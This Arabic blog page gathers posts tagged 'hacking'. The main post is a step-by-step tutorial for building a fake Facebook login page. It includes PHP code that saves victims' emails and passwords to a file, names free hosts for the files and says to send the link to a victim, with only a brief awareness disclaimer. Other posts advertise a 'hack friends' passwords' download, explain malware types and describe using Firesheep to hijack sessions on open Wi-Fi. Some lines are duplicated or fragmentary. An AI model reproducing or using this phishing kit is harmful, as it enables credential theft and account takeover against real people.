إظهار الرسائل ذات التسميات الاختراق. إظهار كافة الرسائل
إظهار الرسائل ذات التسميات الاختراق. إظهار كافة الرسائل
ختراق حساب الفيسبوك لشخص ما "Phishing"تقنية ال
. هي الطريقة الأكثر شيوعا والأسهل في اختراق حساب الفيسبوك لشخص ما "Phishing"تقنية ال
في هذا الموضوع سوف أقوم بشرح هذه التقنية وذلك باظهار كيفية صنع الصفحة الرئيسية الوهمية أو الإفتراضية
: لأي موقع لا بد لك من توفر ثلاث ملفات مشتركة "Phishing" لصنع صفحة
: وهي
(الصفحة الوهمية) HTML ملف
(لتتبع التفاصيل داخل الصفحة التي أنشأتها) PHP ملف
(لحفظ جميع المعلومات في شكل نص) Txt ملف
كيف تنشأ صفحة فيسبوك وهمية ؟
(تأكد من تمام عملية تحميل الصفحة كاملة) "login page" أولا. توجّه إلى الصفحة الرئيسية للفيسبوك
"view page source" ثم اضغط في أي مكان بزر الماوس الأيمن ومن القائمة التي تظهر اختر
لإختيار جميع الصفحة ثم قم بعمليتي نسخ ولصق ( CTRL + A ) ثانيا. من لوحة المفاتيح اضغط على المفتاحين
notepadلجميع أكواد هذه الصفحة على ال
: وسوف تعثر على الكود التالي "action" للبحث عن الكلمة (CTRL + F) ثالثا. اضغط على المفتاحين
action="https://www.facebook.com/login.php?login_attempt=1"
: رابعا. استبدل الكود المبين أعلاه بالكود التالي
action="speeed04.php"
(anyname.php) أو speeed04.php بعدما استبدلته إلى
(anyname.html) أو facebook.html لحفظ هذا الملف بامتداد (CTRL + S) اضغط على المفناح
!!وبانتهائنا من هذه الخطوات تكون صفحتنا الوهمية جاهزة
PHP خامسا. الآن نأتي إلى انشاء الملف الثاني وهو ملف
notepadالتالي ثم الصقه على محرر ال PHPوببساطة لإنشاء هذا الملف قم بنسخ كود ال
(speeed04.php احفظه بالإمتداد الذي اخترته سابقا (في مثالنا السابق اخترنا الإمتداد notepadبعد لصقه على ال
action="https://www.facebook.com/login.php?login_attempt=1"
: رابعا. استبدل الكود المبين أعلاه بالكود التالي
action="speeed04.php"
(anyname.php) أو speeed04.php بعدما استبدلته إلى
(anyname.html) أو facebook.html لحفظ هذا الملف بامتداد (CTRL + S) اضغط على المفناح
!!وبانتهائنا من هذه الخطوات تكون صفحتنا الوهمية جاهزة
PHP خامسا. الآن نأتي إلى انشاء الملف الثاني وهو ملف
notepadالتالي ثم الصقه على محرر ال PHPوببساطة لإنشاء هذا الملف قم بنسخ كود ال
(speeed04.php احفظه بالإمتداد الذي اخترته سابقا (في مثالنا السابق اخترنا الإمتداد notepadبعد لصقه على ال
$fp = fopen("Passwords.htm", "a");
fwrite($fp, "Email:$_POST[email]\tPassword:$_POST[pass]");
echo "
fwrite($fp, "Email:$_POST[email]\tPassword:$_POST[pass]");
echo "
";
?>
!!ما يجب أن تعلمه
هو الرابط الذي يقوم بتوجيه الضحية بمجرّد ادخال معلومتي تسجيل الدخول‘http://www.facebook.com‘"connection" الإيميل والباسوورد) ثم الضغط على)
PHP وبتمام هذه الخطوة نكون قد اتممنا انشاء ملف
سادسا. الآن سجّل في احدى المواقع ذات الإستضافات المجانية
: مثلا
my3gb.com
t35.com
110mb.com
أو
ripway
أو
drivehq
.
.
الخ
: سابعا. بعد تسجيلك في إحدى هذه المواقع المجانية قم باضافة الملفين التاليين إلى الموقع
facebook.html
speeed04.php
(directory) تأكد من أن هذان الملفان في نفس المجلّد
ثامنا. بعد استضافة هاذان الملفان في الموقع المجاني سوف تحصل على رابط مباشر للصفحة الوهمية التي أنشأتها
. (facebook.html سابقا (صفحة
تاسعا. استخدم هذا اللينك أو الرابط لإرساله إلى الضحية. وبمجرّد ما يدخل الإيميل والباسوورد الخاصة بحسابه
سوف تظهر صفحة جديدة آليا على نفس المجلّد تحمل اسم"connection" على الصفحة الوهمية ويضغط على
. تحتوي على كلا من اسم المستخدم وباسوورد الضحية (password.html) الصفحة
وأخيرا نذكركم دائما أن بموضوعنا هذا نرمي إلى توعية المستخدم من مخاطر هجمات الإصطياد الإلكتروني وإعطائه نظرة ولو بسيطة عن الكيفية والطريقة المتّبعة من طرف الهاكرز لسرقة حسابات الفيسبوك وغير الفيسبوك وبذلك يكون المستخدم أكثر حيطة وحذرا من تجنب الوقوع في مثل هذه الصفحات الوهمية
ومن يستعمل هذا الموضوع في غير ما أشرنا إليه فإنه يتحمّل مسؤولية أفعاله كاملة
:إقرأ المزيد من هنا
خترق اكونات اصحابك واعرف كلمه السر الخاصة بهم
لتحميل البرنامج dawnold
خترق اكونات اصحابك واعرف كلمه السر الخاصة بهم
برنامج سرقه باسورد الخاص بالفيس بوك باﻻصدقاء ومستخدمى الفيس بوك
كل ما عليك عمله هو فتح البرنامج واكتب ايميل او اكونت الفيس بوك الخاص يالشحص المراد معرفته رقمه السرى ثم سيقوم البرنامج باظهار الباسورد الخاص به
االبرنامج يقوم بقراءه ملفات الحمايه الخاصه من النسخه اﻻحتياطى واظهار الباسورد لك
Hack facebook password easy
البرنامج للتسليه بين اﻻصدقاء
البرنامج مجانى
خدع الاصدقاء
ما هو الفيروس و كيف هي آليات عمله ... ؟
ما هو الفيروس و كيف هي آليات عمله ... ؟
الفيروس: هو برنامج تخريبي للجهاز مفهومه الأساسي التحكم و الاتلاف و السيطرة على الجهاز المصاب و يتميز بسرعة انتشاره و سرعة تعدده كما أن الفيروسات لها أنواع مختلفة وخطورة متفاوتة منها ما هو خطير اذ ينتشر في ملفات الجهاز الحساسة و البرامج من أجل استغلال الضحية المصاب بالفيروس بسيطرة خارجية
من طرف متحكم و هذا ما نسميه بالاختراق حيث يعرض ملفات الضحية و البيانات الحساسة الى العبث
الخارجي.تتعدد أنواع الفيروسات حسب خدمتها و طبيعة عملها منها ما هو مصمم خصيصا لتخريب الجهاز حيث يتعرض لمشاكل في الملفات و البرامج و منها من يعذر عليك الذخول الى النظام مما يصعب اصلاح النظام و اللجوء الى طرق من أجل اصلاح ما فسدته الفيروسات لم أقول فيروس و جمعتها في فيروسات لأنها بعد اصابة الجهاز تنتشر بكثرة في الملفات و تحقن في برامج عدة لاكمال وظيفتها.
ماهي أنواع الفيروسات ... ؟
يوجد أنواع كثيرة للفيروسات على التسميات التالية
Worm . Spyware . Trojan . Downloader . Backdoor
كما يوجد أنواع أخرى فرعية , نشرح بعض مفاهيم الفيروسات
الأكثر انتشارا و تهديدا للجهاز :
شرح مفاهيم بعض أنواع الفيروسات !
Worm
أو ما يسمى بالدودة ليس "دودة الأرض" بل دودة الحواسب . نوع من الفيروسات لكن لها بعض الخصائص التي تميزها عن الأنواع الأخرى ويعرف بسرعة انتشاره في الجهاز بأستعمال خاصية التشغيل الذاتي Autorun ومنه من ينسخ نفسه داخل جميع الملفات للنظام .. ويستعمل ايضا خاصية "Injections" والتي تسمى الحقن . فيحقن نسفه داخل بروسيس سليم أو برنامج بالنظام .
Trojan
أو ما يسمى أحصنة طروادة, يعتبر النوع الاخطر بين الفيروسات وله انواع كثيرة ومن أهم أعماله Trojan Horse حيث الية عمله تكون بعمل اتصال غير شرعي بالجهاز و القيام بكل عمليات التخريب و التجسس على الجهاز و بهذا يستعمل هذا الصنف في برامج التجسس و الاختراق بكثرة.
يصيب الأجهزة بمجرد تصفح المواقع الخبيثة خاصة المواقع الروسية حيث أكدت بعض التقارير المتخصصة في أمن المواقع و يصب الجهاز عبر تحميل ملفات ملغمة من الأنترنيت.
Backdoor
يعتبر هذا النوع من أخطر الفيروسات بل من اذكاها .. له تعاريف كثيرة تختلف في الحجم و الخطورة لكن أغلبها خطيرة بما فيه الكفاية حيث يمكنه قتل الحمايات والسيطرة على الجهاز يكمن عمله في عمل اتصال غير شرعي بجهاز متحكم بعيد عن طريق فتح بورت وانتظار المتحكم بالضحية لهذا الغرض هو كذلك معتمد في مجال الاختراق . ويمكنه اتلاف و تخريب الجهاز كليا ان تعدد و استمر في الانتشار.
Spyware
من أشهر المصطلحات و أبرزها في منهج الاختراق اذ يعمل على السيطرة على الجهاز و بياناته و ارسالها الى المتحكم وعمل سيطرة جزئية للمستخدم والمشكل الكبير هو دون علم المستخدم لا أقصد الكل بل المبتدئين لأنه هناك من يحلل هذه الأنواع من الفيروسات بل أغلبها انتشرت في الآونة الأخيرة عدة برامج بهذف الحماية من هذا النوع من الفيروسات الا أنها عكس ذلك , بعض الأمثلة :ContraVirus,Errorsafe,MacSweeper,PAL Spyware Remover
ثغره مفااجأه : إضافه في الفايرفوكس تخترق حسابات فيس بوك وتويتر وفليكر
ثغره مفااجأه : إضافه في الفايرفوكس تخترق حسابات فيس بوك وتويتر وفليكر
ثغره مفااجأه : إضافه في الفايرفوكس تخترق حسابات فيس بوك وتويتر وفليكر
قال Eric Butler مبرمج التطبيقات مفتوحة المصدر ، انه إبتكر اضافة لمتصفح الفايرفوكس يمكنها ببساطه بالغه السطو على حسابات بعض المواقع الشهيره مثل الفيس بوك وتويتر وكذلك موقع الصور الشهير فليكر .
- وعبر صفحة مشروعه في موقع codebutler شرح ايريك بنفسه فكرة الاضافه : ( عند تسجيل الدخول إلى الموقع المستهدف عادة ما تبدأ من خلال تقديم اسم المستخدم وكلمة السر.الى الخادم ، الذى يتحقق لمعرفة ما اذا كانت هذه المعلومات مطابقه لحسابك في قاعدة البيانات ، الردود تعود لكم مع “الكوكيز” الذي يستخدم من قبل المتصفح لجميع الطلبات اللاحقة… )
- وواصل باتلر : ( من الشائع جدا للمواقع التى تهتم بحماية بيانات مستخدميها حماية كلمة السر الخاصة بك عن طريق تشفير محاولة الدخول الأولي ، ولكن من غير المألوف و من المستغرب للمواقع ان تقوم بتشفير كل شيء آخر. وتترك كوكيز المستخدم بهذا الضعف )
- واكمل : ( عندما يكون الضحيه على شبكة لاسلكية مفتوحة ، يكون من السهل للغاية تنفيذ هذه الهجمات. مما يسمح للمهاجمين القيام بأي شيء يمكن للمستخدم القيام به على موقع معين. )
- وسدد المبرمج سهام انتقاداته للمواقع الكبرى قائلا : ( هذه مشكلة معروفة على نطاق واسع ، للاسف بعض المواقع الشعبية جدا تفشل في حماية مستخدميها. الإصلاح الفعال الوحيد لهذه المشكلة هو تطبيق نظام التشفير للنهايات ، المعروفة على شبكة الانترنت وخدمة تصميم المواقع ، موقع مثل فيسبوك يواصل صراخه دائما و باستمرار باهتمامه الدائم بسياسة “الخصوصية” لمستخدميه ، في محاولة لا تنتهي لقمع صرخات من المستخدمين الغير راضين ، ولكن كيف تكون الامور عندما يقوم شخص ما بالاستيلاء على الحساب تماما؟ موقع تويتر ايضا انفق ما انفق من اجل تطوير واجهته مؤخرا ولكن دون حمايه حقيقيه لبيانات مستخدميه .)
- وعرض بالتر شرح مصور لعمل إضافته التى اطلق عليها Firesheep على النحو التالى .
1- بعد تنصيب الاضافه ستجد قائمه جانبيه قد ظهرت اليك ، الان اتصل بأي شبكة واي فاي مفتوحه في نطاقك ، ثم اضغط زر Start Capturing وانتظر قليلا
- عند قيام اي شخص على الشبكه بالدخول لاحد المواقع المعروفه للاضافه سيتم مباشرة عرض صورته وبياناته عندك على يسار القائمه الجانبيه كما توضح الصوره التاليه
-الان اضغط مرتين على اسم او صوره المستخدم على اليسار ، انت الان بكل صلاحيات هذا المستخدم على الموقع .
وختم المبرمج الدرس الموجه الى كل المواقع التى تتهاون في تشفير وحماية بيانات مستخدميهم قائلا : ( المواقع الشهيره لديها مسؤولية حماية اعضاؤها الذين يعتمدون على خدماتها. لقد تمت
جاهل هذه المسؤولية لفترة طويلة جدا ، وحان الوقت للجميع للمطالبة باتصال للمواقع أكثر أمنا. وأملي هو أن Firesheep سيساعد المستخدمين على الفوز.
- وكان عدد كبير من المواقع التقنيه الكبيره مثل ( انفورميشن ويك ) قد خصصت مساحات واسعه للتحدث ووصف تلك الثغره المرعبه








